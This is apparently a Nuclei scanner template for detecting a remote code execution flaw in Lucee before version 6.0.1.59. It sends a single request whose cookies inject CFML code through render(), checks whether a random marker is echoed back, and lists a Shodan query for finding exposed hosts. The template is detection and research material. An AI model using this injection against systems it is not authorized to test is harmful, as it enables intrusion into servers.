nuclei-templates/http/vulnerabilities/lucee-rce.yaml

id: lucee-rce

info:
  name: Lucee < 6.0.1.59 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  reference:
    - https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.title:"Lucee"
  tags: lucee,rce,oast

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>'); CF_CLIENT_LUCEE=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');        

    matchers:
      - type: dsl
        dsl:
          - contains(body, "{{randstr}}")
          - contains(header, "cfid")
          - contains(header, "cftoken")
        condition: and
# digest: 4a0a00473045022060fe80816425743744cb6d3ee5ff6297880c1e513232fd481e5c8844dbea0940022100bb98ce5b02fd42e46d0a71c17251a2d7b7cc8c7169dea74e245eaefa0f3ce228:922c64590222798bb761d5b6d8e72950